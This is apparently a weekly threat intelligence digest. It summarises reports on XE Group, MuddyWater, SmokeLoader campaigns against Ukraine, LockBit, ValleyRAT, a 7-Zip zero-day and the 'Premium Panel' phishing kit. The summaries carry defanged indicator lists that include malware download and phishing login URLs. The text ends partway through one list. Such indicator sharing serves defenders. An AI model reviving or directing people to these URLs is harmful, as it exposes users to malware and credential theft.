This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 59 threat intelligence reports and compiled a brief summary of each, along with the relevant metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.
Title: XE Group: From Credit Card Skimming to Exploiting Zero-Days
Link: https://intezer.com/blog/research/xe-group-exploiting-zero-days/
Summary: XE Group is a sophisticated cybercriminal organization that has shifted focus from credit card skimming to targeted information theft since its emergence in 2013. Recent research by Solis Security highlights their exploitation of zero-day vulnerabilities, specifically CVE-2024-57968 and CVE-2025-25181, affecting the VeraCore software used in logistics, enabling them to deploy ASPX webshells for persistent access to compromised systems. The group has demonstrated tactical adaptability, maintaining unauthorized access for over four years and extending their operations to exploit supply chains within manufacturing and distribution sectors, utilizing advanced techniques such as obfuscated PowerShell scripts and remote access Trojans.
Threats: xegroup_group meterpreter_tool supply_chain_technique magecart_group aspxspy_shell snipr_tool netstat_tool
Indicators of compromise:
-------------------------
ip: 171[.]227[.]250[.]249, 123[.]20[.]29[.]193, 222[.]253[.]102[.]94, 222[.]253[.]102[.]94:7979
domain: xegroups[.]com, object[.]fm, hivnd[.]com, xework[.]com, paycashs[.]com, sexadult[.]com
url: https://hivnd[.]com/software/7z[.]exe
hash:
- sha256=884c394c7b3eb757ae57050ac2e6a75385a361555e8e4272de1a3cf24746eec7,
- md5=cb424b3be3cb35ec1349bd3e09c53cc4,
- sha256=ba2109b5a3ccebbc494ee93880b55640539c7d25b85bc12189f0c671ce473771,
- sha256=680b7e8ec8204975c5026bcbaf70f7e9620eacdd7bf72e5476d17266b4a7d316, md5=7abb73b7844f2308d9c62954e6e8b7fc, sha1=032dd95a1299f37aaa76318945e030eb7da94da9,
- sha256=322f8cd560d5e10e93af3ea6d3505c8de213f549e6627c3ef4664ed92ba55f56, sha1=84e7f4ff1f93a4297c2e2c4e54f14edb18396b60, md5=457d7e3a708d1b5c6a8d449e52064985,
- sha1=16db01fe25b0c09e18d13f38c88a4ead5d10e323, sha256=c564acd69efa62a5037931090bf70a6506419fdf59ec52f8d1ab0b15d861cc67, md5=339a79457a8cf3504312d394be3ece98,
- sha1=ede5ddb97b98d80440553b23dfc19fdb4adc7499, md5=7a9b5c3bb7dab0857ee2c2d71758eca3, sha256=38b2d52dc471587fb65ef99c64cb3f69470ddfdaa184a256aecb26edeff3553a,
- md5=7b5b7d96006fec70c2091e90fbf02b99, sha1=9e928a26aa3c0e6eb8e709fc55ea12dcf7e02ff9, sha256=013ccea1d7fc2aa2d660e900f87a3192f5cb73768710ef2eb9016f81df8e5c70
email: xecloud@icloud[.]com, xethanh@gmail[.]com, joyn[.]nguyen@gmail[.]comTitle: Unmasking: Technological Advancement and Evolution of MuddyWater in 2024
Link: https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf
Summary: MuddyWater, an Iranian threat actor associated with the Ministry of Intelligence and Security (MOIS) since 2017, has been actively conducting cyber operations primarily targeting Israel and other nations in response to geopolitical events. Known for sophisticated spear-phishing campaigns in the Middle East, particularly against Israeli entities, the group employs a diverse malware arsenal, combining custom-developed tools and legitimate software for persistence and stealth. With tactics involving social engineering, COM Hijacking, and encrypted communication channels, MuddyWater showcases a strategic evolution in state-sponsored cyber activities, utilizing advanced techniques like DNS and HTTP-based backdoors while demonstrating adaptability in exploiting known vulnerabilities and legitimate infrastructure for ongoing access to sensitive data.
Threats: muddywater_group muddyrot anchorrat cannonrat neshta sad_c2_tool havoc com_hijacking_technique lolbin_technique spear-phishing_technique dll_sideloading_technique dllsearchorder_hijacking_technique blackout_rat blackpos venom_proxy_tool simplehelp_tool upx_tool go-socks5_tool pheonix treasurebox mythic_c2 chisel_tool
Indicators of compromise:
-------------------------
ip: 212[.]232[.]225[.]5, 157[.]20[.]182[.]102
domain: 1drv[.]business, magicallyday[.]com, ulpanim[.]wiki, spaziogroup[.]org
url: https://ulpanim[.]wiki/signup, https://ulpanim[.]wiki/order, https://ulpanim[.]wiki/contact, https://ulpanim[.]wiki/shop, https://ulpanim[.]wiki/detail, https://ulpanim[.]wiki/support1, https://ulpanim[.]wiki/support2, https://ulpanim[.]wiki/support3
hash:
- md5=97e844797181cd163b794529447219d3,
- md5=15022bda37f65f33cad2bb5bf84a3900,
- md5=283c87eaf43a3099217a6d6f01d9c4f3,
- md5=963b75b2a747eec611265a22582d38e2,
- md5=c3b990474c06086db4311c1553570174,
- md5=6e5451b250731fcb5713bd043f406bf1,
- md5=ac819c8e223c20df9bb9a80ab5c20e4a,
- md5=b15dd02164a9bb53356ba1d748301bf7,
- md5=50da52b517c708a0d409ba20fd00b10f,
- md5=7d5b1ae57599940faf51e0b38f4824bd,
- md5=f700378578df895e80c0dfeea68fe694,
- md5=297f77096dfb485641b4594c83b32a7c,
- md5=c4406f5fff870955af772d676a30a0cf,
- md5=25b6f3f4b13bc53dd4981915cdd95e33,
- md5=2f257ead7f42df4e9115ddab552e77e4,
- md5=c851e849c8442727eac69225203ee7f7,
- md5=d3e259a8caa7e23e89453a387caa3a15,
- md5=c1ef5f29c1811444e1e96c25e667f18d,
- md5=fd5b55c1b97bef7b4f3114d39984e597,
- md5=9077295f0eb9db45fc495a04637ee197,
- sha256=044365681b0e781292e79c19906f379b7c3e0d5a404b19b56ed7b447b75d1485,
- sha256=6f6869fe0d47ef2abbd30651f6348de3868e4e2f642e30f468bc8376ec30b150,
- sha256=153128c13808b275b6f00bda3a616ee6fbb26f21d9124b13ab6daf1c7e7ff48e
email:Title: GetSmoked: UAC-0006 Returns With SmokeLoader Targeting Ukraine’s Largest State-Owned Bank
Summary: UAC-0006, a financially motivated threat actor group, is executing phishing campaigns against PrivatBank in Ukraine, utilizing password-protected archives to deliver malicious files like JavaScript, VBScript, and LNK files, primarily using SmokeLoader for payload execution and command-and-control communication. Detailed analyses have identified specific SHA256 identifiers for malicious files that focus on payment instructions and passports, while attackers employ email deception to entice victims into downloading these files. The group has evolved its tactics to include LNK files that leverage PowerShell commands for executing files from C2 servers, displaying tactics similar to FIN7 and other Russian APT groups, with significant risks to sensitive data, credential security, brand integrity, and potential supply chain vulnerabilities.
Threats: getsmoked_campaign uac-0006_group smokeloader process_injection_technique carbanak_group empiremonkey_group blackbasta credential_harvesting_technique supply_chain_technique spear-phishing_technique
Indicators of compromise:
-------------------------
ip: 94[.]156[.]177[.]51, 89[.]23[.]107[.]219, 109[.]70[.]26[.]37
domain: connecticutproperty[.]ru, constractionscity1991[.]lat, restructurisationservice[.]ru, spotcarservice[.]ru, 3-zak-media[.]de, cityutl[.]ru
url: http://89[.]23[.]107[.]219/privat[.]exe, http://3-zak-media[.]de/temp/paxynok_privatbank_06_01_2025p[.]zip, http://3-zak-media[.]de/temp/gate[.]php, http://89[.]23[.]107[.]219/invoce[.]pdf, http://89[.]23[.]107[.]219/final[.]mp4, http://spotcarservice[.]ru/fdjskf88cvt/invoce[.]pdf, http://spotcarservice[.]ru/fdjskf88cvt/invoce2[.]pdf, http://spotcarservice[.]ru/fdjskf88cvt/putty1[.]exe, http://spotcarservice[.]ru/fdjskf88cvt/yumba/putty[.]exe, http://3-zak-media[.]de/krayer-buergerschaft/Web/bilder/putty1[.]exe, http://cityutl[.]ru/download/pax[.]pdf, http://cityutl[.]ru/download/putty[.]exe
hash:
- sha256=5a0b48ccc1a353c4ace5e9626f17622611432a016577797d4c891ca945ffa7f8,
- sha256=80c450570cd338a594546f9e6c189ffc2a849d3bac3759c53592af30840ffb90,
- sha256=e0c57518aeef787bcf7cc13484486cfa48458bdf6b0baee02598e777a3ef83f2,
- sha256=ca90047f4c8b5c6628e38f11c1b3411ac8f0040a2d72e35c1a37de1d9a127131,
- sha256=dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0,
- sha256=119b79b9cdb773dc951c36fe35ea0237e5f035bda6493103399e3697dc929c3d,
- sha256=21bbe1929d20c5525349dabe58748798f9cdaa1abd25f13dc98b4c0b8ffdde23,
- sha256=31ba8ceffe689b570dc696c97291780288f16a15f91d3e55bf13d7dcdf3858a9,
- sha256=3216f4728788cc9a0416290d31a2fdc97bcd3f028582efc52dc1cd8208f0cebd,
- sha256=38eb41eebbc889d046d354de345cf7c073971f62c2aaf53163ecefb7914273cc,
- sha256=3998a0d2e96417ce234a79897df8bcb879295043ce3d7f188c7b3de7375b26e5,
- sha256=3bfb1a880ea62bb4ad24e98a3a641b85e2392942af59727701c57ed094e5554e,
- sha256=4a559be38d60d64cb378643cc4332f40fe94d5f6c4f71a4f593e4efcd918349c,
- sha256=4abf59022d70abac175ddd896e4d709d256ca56a7a9dd8a9805eb5f2af490576,
- sha256=527a4b00fc95ecb9c1308ccc4ebd6bac7c03053e8ed11cdeb08ac3a6af8775c3,
- sha256=5b259a3ce6c0ce88690eb15d71162a930f267d960e26e88d37c92403d747f44a,
- sha256=6d29acbbaf0c75eca458e3936dea7d20fceca415b897573b704d151c7e9261b8,
- sha256=75f20c4171c699a991c45671b46174b0879e1fcf83ee4cdc63af8d6a833698b3,
- sha256=7c3a1bbbcbd2a328d8fb70efbdc55efaeb23b8511955109facef5c6c20350afb,
- sha256=8a6466093bc38a5d075148fde75952372ab5d7bb991b74773d5e019e0e0145f0,
- sha256=993518e45c78f9cc19daefbabef980e2e16a5e2fa11036f1e98c6446efb38676,
- sha256=9aad92a2d4b310a344f102436f12d29c7ac635478918874181a18182e4f530b4,
- sha256=a2b10deef491ec1430f65157a411a47de0e9ad1431518b2fa4fe5f18a4f3e2bd,
- sha256=b62d21ec1f54e7f7d343bc836e87a13adf9f40f87fc54a7d3788baea9a2c2b08,
- sha256=b815638024caac8bb7e482465564ec2a091f2af52cbf635be268e9093cbc4e92,
- sha256=bfc7164ed334044c780f0f15b56b559dfabbb0007ba268c180a281ac5bcc1f19,
- sha256=cd8dc77de5811a6a215e74cf61b3c34fcf28d5a05df5e4fc26fc9ad2ee72868b,
- sha256=d143873322c13496b2fc580c07fead99c1679afe831202913cee522d88ff7795,
- sha256=d35cd24668474580161008eb655ce979400e382a58f0e6967b10a4d86343b6ec,
- sha256=ee5a55588bbdfe6749da1962a9b7d1b29a87a10a324347070edd9e8ec33f7c82,
- sha256=f1d97e23cb0820e851d457dbb930576890e5bc6313cdf30d09f160cbdcdac90f,
- sha256=f4222b240f88d43e6c63b9d9c09d93c10ba882b91fc4a61c0cd833f7c79b4c44,
- sha256=f72f2e0f0873885313dbde954f26acd1c02ed963512111b3f00cf7e9cd6e5e6d,
- sha256=e8b08cb0774145ac432406f5e579aabaddb485ad29ba7d1eb1c5fb3000c5eefa,
- sha256=7722151293bdc50640c719a55438ffd663a3d2bccc70392cdce8052b651afea0,
- sha256=9833cbd22fd50181f8939114920e883bacf8d727337f5dcdf4450d0312eca188,
- sha256=a3aac43dd6a592c9ec58121a09c8cd22fb1b2d05ca1ff91259e43565d5e33022,
- sha256=97fe6b08d8a40c1f6990ca5c7405fdc98e014cf1fdfc2646580bffd34c1160ec,
- sha256=476a8e2d8eae4d2315e719bf67be312c5e88476509bdbac2dffee48986ad54c1,
- sha256=0a898f1df135d52ef5006f8dba9e9fce4ab4a85e07a9417f39c7612113eb6210,
- sha256=1043ce610dd6e8b0cda635dbe1f15524c25d816f89ad22f9bc34403ef8e771cc,
- sha256=107190bb8f28ed2bb2f0883ae1fbfe0e50cacc54c17dc526c865f6f46f40107a
email:Title: LockBit — Persistent TTPs in the Larger Ecosystem
Link: https://redsense.com/publications/lockbit-persistent-ttps-in-larger-ecosystem
Summary: LockBit, a significant ransomware group originally dismantled by international law enforcement nearly a year ago, continues to exert influence on the cyber threat landscape. Following its evolution from ABCD ransomware in 2019 to LockBit 3.0, the group has provided tools like the LockBit builder that permit the creation of tailored ransomware variants for attacks. Even after its takedown, independent actors have leveraged LockBit's tactics, utilizing sophisticated methods for data exfiltration and lateral movement, while also employing various techniques to evade detection. This decentralized use of LockBit, along with strategic alliances with other threat groups, has contributed to an ongoing risk to numerous sectors through continued LockBit-based attacks.
Threats: lockbit lockbit_group exmatter_tool zeon conti credential_dumping_technique hellokitty blackcat blacksuit_ransomware avaddon revil avos_group national_hazard_agency_group bl00dy_group 3am_ransomware citrix_bleed_vuln akira_ransomware ransomhub Trojan.Win32.Inject.aokvy uac_bypass_technique cobalt_strike mimikatz_tool pchunter_tool process_hacker_tool gmer_tool 0ktapus_group luminati_tool domain_fronting_technique brc4_tool
Indicators of compromise:
-------------------------
ip: 198[.]199[.]74[.]168, 198[.]199[.]82[.]43, 159[.]89[.]236[.]37, 104[.]248[.]23[.]242, 89[.]203[.]223[.]42, 198[.]199[.]74[.]168:22, 198[.]199[.]74[.]168:80, 198[.]199[.]74[.]168:443, 198[.]199[.]82[.]43:22, 198[.]199[.]82[.]43:25, 198[.]199[.]82[.]43:53, 198[.]199[.]82[.]43:80, 198[.]199[.]82[.]43:443, 198[.]199[.]82[.]43:3389, 198[.]199[.]82[.]43:5432, 104[.]248[.]23[.]242:22, 104[.]248[.]23[.]242:25, 104[.]248[.]23[.]242:53, 104[.]248[.]23[.]242:80, 104[.]248[.]23[.]242:443, 104[.]248[.]23[.]242:3389, 104[.]248[.]23[.]242:5432, 159[.]89[.]236[.]37:22, 159[.]89[.]236[.]37:25, 159[.]89[.]236[.]37:53, 159[.]89[.]236[.]37:80, 159[.]89[.]236[.]37:443, 159[.]89[.]236[.]37:3389, 159[.]89[.]236[.]37:5432
domain: exploit[.]in, realmigrator[.]com
url:
hash:
- sha1=7c67976bfc3ef3c673d5cabc60b7f6fbe0ab19dc
email:Title: Rat Race: ValleyRAT Malware Targets Organizations with New Delivery Techniques
Link: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china
Summary: Morphisec Threat Labs has uncovered a sophisticated multi-stage malware named ValleyRAT, linked to the Silver Fox APT actor, who has adapted their tactics by using a single URL for multiple attack iterations. The malware employs various distribution channels, like phishing emails and deceptive websites, to spread Remote Access Trojans (RATs), specifically targeting crucial roles within finance and accounting sectors. The infection chain begins with users downloading a counterfeit Chrome browser and executing a file that triggers the malware, which utilizes DLL search order hijacking to inject malicious payloads into legitimate applications. ValleyRAT, written in C++, features capabilities such as keylogging and stealthily connects to external addresses while avoiding detection through advanced techniques that manipulate security mechanisms.
Threats: valleyrat silver_fox_group dllsearchorder_hijacking_technique dll_hijacking_technique dll_sideloading_technique apc_injection_technique process_hollowing_technique donut
Indicators of compromise:
-------------------------
ip: 149[.]115[.]250[.]19, 8[.]217[.]244[.]40, 154[.]82[.]85[.]79, 118[.]107[.]44[.]219, 43[.]250[.]172[.]42, 202[.]146[.]222[.]208, 103[.]183[.]3[.]10
domain:
url: https://anizom[.]com, https://karlost[.]club
hash:
- sha256=968b976167b453c15097667b8f4fa9e311b6c7fc5a648293b4abd75d80b15562,
- sha256=311f2d4ef2598e4a193609c3cd47bf4ff5fb88907026946ecffe6b960d43d5b2,
- sha256=51a9d06359952f6935619e8cf67042d2cec593788c324b72cffc0d34b1762bb0,
- sha256=53a6735ce1eca68908c0367152a1f8f3ca62b801788cd104f53d037811284d71,
- sha256=6ed466a2a6eeb83d1ff32ba44180352cf0a9ccc72b47e5bd55c1750157c8dc4c,
- sha256=a87745682da20ddfd6eac7ff2d27fec73ff56c6e9b4438121dcb6ba699c5cb3c,
- sha256=1db77692eaf4777f69ddf78c52424d81834572f1539ccea263d86a46f28e0cea,
- sha256=3989f7fa8d1d59ebc6adea90e3958a892b47d94268bf9d5c9c96811f3fb65b00,
- sha256=7c2a1b09617566ff9e94d0b1c15505213589f7fd3b445b334051d9574e52e0f5,
- sha256=bb89e401560ba763d1c5860dd51667ba17768c04d00270bf34abebac47fd040e
email:Title: CVE-2025–0411: Ukrainian Organizations Targeted in Zero-Day Campaign and Homoglyph Attacks
Link: https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html
Summary: The ZDI Threat Hunting team discovered a zero-day vulnerability in the 7-Zip archiving tool, labeled CVE-2025-0411, which was actively exploited in a targeted SmokeLoader malware campaign against Ukrainian organizations amid regional tensions. This vulnerability allows attackers to circumvent Windows Mark-of-the-Web protections through a technique called double archiving, which disguises malicious files by embedding them in layers of archives, combined with homoglyph attacks to mislead users about file types. Primarily deployed via spear-phishing campaigns, the exploitation led to successful compromises of government and civilian sectors in Ukraine, exploiting weak cybersecurity defenses, particularly among smaller local governmental bodies.
Threats: homoglyph_technique smokeloader motw_bypass_technique spear-phishing_technique credential_harvesting_technique
Indicators of compromise:
-------------------------
ip: 185[.]156[.]72[.]78
domain: api-mirosoft[.]com, trojan[.]win32[.]downloader[.]bz, xn--api-mirosoft-ehk[.]com, alfacentarusmulticopter[.]ru, johnfabiconinteraption[.]ru, storeagroculturnaya[.]ru, unicalads[.]ru, lazaretmed[.]pw, technoads[.]pw, oncomnigos[.]online, southlander[.]ru, goodmastersportunicum[.]ru, ukr-netfilediscdownloadapplication[.]ru
url: http://alfacentarusmulticopter[.]ru/index[.]php, http://johnfabiconinteraption[.]ru/index[.]php, http://storeagroculturnaya[.]ru/index[.]php, http://unicalads[.]ru/index[.]php, http://lazaretmed[.]pw/index[.]php, http://technoads[.]pw/index[.]php, http://oncomnigos[.]online/index[.]php, http://185[.]156[.]72[.]78/MyFolder/pay[.]zip, http://southlander[.]ru/dklfhgjdfhgjd78khdgfjgh/akt[.]bat, http://goodmastersportunicum[.]ru/load/svc[.]exe, http://ukrnetfilediscdownloadapplication[.]ru/file/download/68523654563845638465384585863874653786587365934/AKT_PAX_26_09_2024p[.]rar, https://ukrnetfilediscdownloadapplication[.]ru/file/download/68523654563845638465384585863874653786587365934/AKT_PAX_26_09_2024p[.]rar
hash:
- sha256=ba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826,
- sha256=84ab6c3e1f2dc98cf4d5b8b739237570416bb82e2edaf078e9868663553c5412,
- sha256=7786501e3666c1a5071c9c5e5a019e2bc86a1f169d469cc4bfef2fe339aaf384,
- sha256=2e33c2010f95cbda8bf0817f1b5c69b51c860c536064182b67261f695f54e1d5,
- sha256=888f68917f9250a0936fd66ea46b6c510d0f6a0ca351ee62774dd14268fe5420,
- sha256=a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2,
- sha256=554d9ddd6fd1ccb15d7686c8badb8653323c71884c7f20efb19b56324ff34fc1,
- sha256=54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6,
- sha256=62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543,
- sha256=cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c,
- sha256=8ee225bdd38cf6fd014a16beb9e33a0650147a9b7ea2104afe2f47c01bd1db0b,
- sha256=b3df042c5286fa91a4555e105038364bc66bfe7fdfe3769eb26b96e0ffe6096b,
- sha256=915b73a57aaf759fbd5352d79656e1b697545e6c9d953ab05aacf61ed4f6e397,
- sha256=d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21,
- sha256=fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144,
- sha256=5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34
email:Title: SmokeLoader Malware Found in Open Directories Targeting Ukraines Auto & Banking Industries
Summary: Recent research has identified open directories hosting SmokeLoader malware samples, specifically targeting Ukraine's automotive and banking sectors. Discovered on two misconfigured servers in Poland and Ukraine, the malware utilizes various financial-themed lure documents, such as fabricated invoices and account statements, to increase user interaction and compromise systems. SmokeLoader, initially recognized in 2011 and often associated with suspected Russian threat actors, serves to gain initial system access before deploying additional malicious payloads. The operational behavior of SmokeLoader observed during the research, including its injection into the explorer.exe process and communication with command-and-control servers, underscores the ongoing threat posed by cyberattacks targeting Ukrainian organizations, particularly through adaptable and financially motivated tactics.
Threats: smokeloader
Indicators of compromise:
-------------------------
ip: 2[.]59[.]163[.]172, 2[.]59[.]163[.]72, 88[.]151[.]192[.]50, 94[.]156[.]177[.]72:80, 2[.]59[.]163[.]71:80, 94[.]156[.]177[.]72, 66[.]63[.]187[.]25, 88[.]151[.]192[.]71
domain: www[.]connecticutproperty[.]ru, downloadmanager[.]ru, oncomnigos[.]ru, consultationoffice[.]ru, www[.]spotcarservice[.]ru, www[.]fileexportinc[.]ru, restructurisationservice[.]ru, fileexportinc[.]ru, constractionscity1991[.]lat, ns2[.]constractionscity1991[.]lat
url: http://constractionscity1991[.]lat, http://restructurisationservice[.]ru, http://connecticutproperty[.]ru
hash:
- sha256=9833cbd22fd50181f8939114920e883bacf8d727337f5dcdf4450d0312eca188,
- sha256=f8bd5f0408409ea63a270d5aad8da5f0cb557f9a82e0da3e8077cbe589288054,
- sha256=1118a93cc63a70ba8348182f7012ddbeecf890345941c82376ac967faf55a295,
- sha256=4b00565a29eeb0446393d0538e8f24de232339cf3ffb6a76a2bce3ba160c2066,
- sha256=5e7602b9073b8cf5c1a6afc6d0c8366545da65d2b48eb109f1bd9f40a58e73c0,
- sha256=7991bfff4eb5f50aa9f5d3d95064411987a29de9621fc5afca9e4978ca568941
email:Title: Premium Panel: phishing tool used in longstanding campaigns worldwide
Link: https://www.intrinsec.com/wp-content/uploads/2025/01/TLP-CLEAR-Live-Control-Panel-Premium-EN.pdf
Summary: The "Premium panel" phishing toolkit is a sophisticated framework designed for credential logging and redirecting victims to counterfeit login pages, particularly targeting sectors like banking and logistics across various Western countries and specific regions such as Saudi Arabia and South Africa. Discovered to operate for over two years, the toolkit utilizes common IP addresses across multiple phishing domains, suggesting centralized operations by the same threat actor, with instances of phishing sites targeting organizations in Cyprus and Hungary being noted. The toolkit employs a crucial script, "processor.php," which keeps victims engaged by maintaining their browser connection and facilitating redirection, enhancing the effectiveness of the phishing campaigns. Investigations into historical registries have unveiled patterns linking email addresses used in domain registrations, hinting at the potential tracing of threat actor groups behind the operations. Additionally, the toolkit's infrastructure exploits compromised legitimate websites and temporary domain services, showcasing its adaptability and increasing the likelihood of widespread phishing activities targeting financial sectors.
Threats: premium_panel_tool mitm_technique geral
Indicators of compromise:
-------------------------
ip: 139[.]177[.]180[.]48, 87[.]121[.]22[.]102, 87[.]121[.]22[.]214, 2[.]59[.]255[.]11, 20[.]100[.]169[.]28, 185[.]221[.]67[.]30, 45[.]55[.]112[.]74
domain: cloudwayapps[.]com, tempurl[.]host
url: http://kao[.]jfk[.]mybluehost[.]me/wp-admin/web, http://laelenasa[.]com[.]ar/auqanta/web, http://tly[.]vgj[.]mybluehost[.]me/cgi-bin/web, http://zppwpailkq[.]cfolks[.]pl/ar/web/login[.]php, http://didc-malls[.]net/nk1/de/delogin/66f9272999098-70971[.]php, http://redeem[.]quantasgift[.]store/v2/web, http://gth[.]srl[.]mybluehost[.]me/wp-content/web/bill[.]php, http://qantas[.]seawallet[.]pro/aufly/web, http://cggelhs4fvad[.]adigeni[.]ge/eazy/web, http://ryiucndes[.]mypi[.]co/T/il/index[.]php, http://of-cyprusgroup[.]com/cy/auth/login[.]php, http://profiles[.]riders[.]guide/js/web, http://wordpress-983281-3799665[.]cloudwaysapps[.]com/wpadmin/ca/auth/entrar[.]php, http://0rc5zd5pdqbnlrkv5[.]adigeni[.]ge/eazy/web, http://complete-card-tdn9g8zr3dqc[.]adigeni[.]ge/ccb/web, http://lna[.]ire[.]mybluehost[.]me/wp-content/web, http://ezv[.]jnk[.]mybluehost[.]me/auth/login[.]php, http://www[.]mobilvodafone[.]com/auth/auth[.]php, http://authentication[.]watchsanda[.]com/auth/login[.]php, http://serwer2255313[.]home[.]pl/finan/finan/auth/login[.]php, http://connect-client[.]serv00[.]net/app/app/login[.]php, http://snize-next[.]com/hy0/de/delogin/66e077efe7cf2-73438[.]php, http://espace-documents-authsecappmovil[.]codeanyapp[.]com/Particuliers/sg/web/wait[.]php, http://united-domainsgub9tvon[.]adigeni[.]ge/ud/web/add[.]php, http://webid[.]netcharge[.]lat/verif/miles-and-morekreditkarte[.]com/web/login[.]php, http://corres[.]live/GtTracking/auth/card[.]php, http://atzqatavtz[.]adigeni[.]ge/wino/web/add[.]php, http://tcuvbwgt8l[.]adigeni[.]ge/wino/web/add[.]php, http://7f6n14eabe[.]adigeni[.]ge/wino/web, http://bbndf7evqc[.]adigeni[.]ge/wino/web/add[.]php, http://qzif5odwmi[.]adigeni[.]ge/wino/web/add[.]php, http://w4hquoo7dg[.]adigeni[.]ge/wino/web/add[.]php, http://dervfpvcvy[.]adigeni[.]ge/ud/web/add[.]php, http://kamakatchi[.]serv00[.]net/NETFLIX/app/app/login[.]php, http://satfera[.]in/build/auth, http://myj[.]pju[.]mybluehost[.]me/web, http://clinicafatima[.]com/otp/auth/login[.]php, http://ltswedbank-ab[.]com/auth/login[.]php, http://www[.]post-israel[.]savacrm[.]com/il/index[.]php, http://ecomm-shop[.]org/kn21/page/wp/66c1c28a54602-47939[.]php, http://dash-appserv[.]net/hg0/page/wp/66bd88d6bedde-23358[.]php, http://urn[.]pyw[.]mybluehost[.]me/web, http://pintacaritasmiami[.]com/[.]well-known/-/global/takare/login[.]php, http://casabeachfront[.]in/mainz/auth/entrar[.]php, http://domains[.]bavarianmarketing[.]org/wp//domains/clients/web/add[.]php, http://lucassouzajlle[.]com/mains/auth/entrar[.]php, http://radiosouzahits[.]com[.]br/admin/swf, http://swedbankgroup[.]info/auth/login[.]php, http://onlineswedbank-lt[.]com/auth/login[.]php, http://radionave[.]com/scripts/colorbox/images/ie6, http://sparkteamsupport[.]com/web, http://swedbank-lt[.]online/auth/login[.]php, http://acconnex[.]eu/app/login[.]php, http://imprentacubodigital[.]com[.]ar/hu/auth/login[.]php, http://frezik-art[.]pl/finance/Financer/Pos/auth/login[.]php, http://serwer2043802[.]home[.]pl//biblioteka2018/szablon/Post, http://giermusicclub[.]com[.]ar/lt/auth/login[.]php, http://stanfordheathaccountants[.]co[.]uk/cyprus/auth/login[.]php, http://commerzbank-de-phototan[.]info/cmz[.]de/DEcommerzbanka_edit/DEcommerzbanka_edit/web/login[.]php, http://tfserviceupda[.]wpenginepowered[.]com/tf/de/home/login[.]php, http://ebenezerbandeira[.]com[.]br/cgi-bin/web, http://ci45998[.]tw1[.]ru/caixa/home/entrar[.]php, http://campomaior[.]website[.]radio[.]br/imagens/ico_redes/web/payment, http://cidadejornal[.]website[.]radio[.]br/includes/web/payment, http://nerco[.]es/wpincludes/Text/Diff/Engine/host/auth/login[.]php, http://rockbyes[.]com/de/tf-bank/home/login[.]php, http://radiothethemix[.]com/200/web/bill, http://app-update-service[.]site/wp-content/TF-0199/tfbanks/home/login[.]php, http://heisateam[.]com/ar/servizo/home/loading1[.]php, http://wise-idtransfer[.]napraw-agd[.]pl/valid/web/index[.]php, http://wise-transfer[.]napraw-agd[.]pl/suift/web/index[.]php, http://wise-signup[.]witchclean[.]com/web/index[.]php, http://wise-line[.]nilangroup[.]com/lg/web/index[.]php, http://centerpointaddisfurnishedapartment[.]com/yettel[.]hu/auth/login[.]php, http://wiseonline[.]fabsmarketinggroup[.]com/sss/web/index[.]php, http://targoholiscarl1999281292[.]codeanyapp[.]com/identificationauthentification/home/login[.]php, http://sb1[.]724[.]mytemp[.]website/s/auth/login[.]php, http://transwise[.]nilangroup[.]com/verify/web/index[.]php, http://tf-banks[.]online/De/tf-bank/home/login[.]php, http://fpv[.]ths[.]mybluehost[.]me/SPK/Online/spa/home/bic[.]php, http://www[.]brilliantcctvcamera[.]com/spk/sparkasse%20de/spa/home/bic[.]php, http://ckx[.]cna[.]mybluehost[.]me/u[.]p[.]s/app/track[.]php, http://kanonjdid[.]tempurl[.]host/xnallo/web/login[.]php, http://of[.]cyprus[.]centerpointaddisfurnishedapartment[.]com/cyprus/auth/login[.]php, http://highshopu[.]com/kWw3r/pos/auth/login[.]php, http://lizard[.]hu/sa/home/entrar[.]php, http://a2[.]detaynet[.]com/SWISS/auth/login[.]php, http://xqq[.]bof[.]mybluehost[.]me/mphb%202/2023/web/login[.]php, http://xvb[.]zca[.]mybluehost[.]me/sp2/abonne/delogin/6641e4a0b0a76-99562[.]php, http://onlinegatewayunpaidfees[.]com/JFYRTADZ/index[.]php, http://nilangroup[.]com/assets/online/web/index[.]php, http://billsleek[.]in/re0/abonne/delogin/663cc2566f456-49777[.]php, http://xvb[.]zca[.]mybluehost[.]me/sp2/abonne/delogin/663cdc75b4f70-86660[.]php, http://dal4[.]hostclusters[.]com/~pwaprmaze/AKEMZLA/ZAMELZ/SG/web/login[.]php, http://reschedulepackonlineus[.]com/JFYRTADZ/index[.]php, http://cyber_folks[.]schmerztherapieschumann[.]de/c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://cyber_folks[.]kruzineser[.]org/c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://cyber_folks[.]scrimbus[.]de//c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://onlineuspsportalusa[.]com/JFYRTADZ/index[.]php, http://drshamimkhan[.]in/config/sparkasse/spa/home/login[.]php, http://bakeforeme[.]corenetwork[.]net/mycouriers/web, http://fordpussetto[.]com[.]ar/sparkassea/sparkasse/spa/home/bic[.]php, http://sidikhsu[.]com/sparkasse/spa/home/bic[.]php, http://wiseonline[.]aykernasbungalov[.]com/wises/web/index[.]php, http://receber-post-correiosrrfd[.]codeanyapp[.]com/SG1/sg/web/login[.]php, http://www[.]southerntennis[.]com/~pamrlr/PP/sg/web/login[.]php, http://dolphin4k[.]com/jw/wises/web/index[.]php, http://musclemeal[.]co[.]in/mll/comp/de, http://web-seb[.]com/web/login[.]php, http://69c[.]6b5[.]mywebsitetransfer[.]com/SWISS/auth/login[.]php, 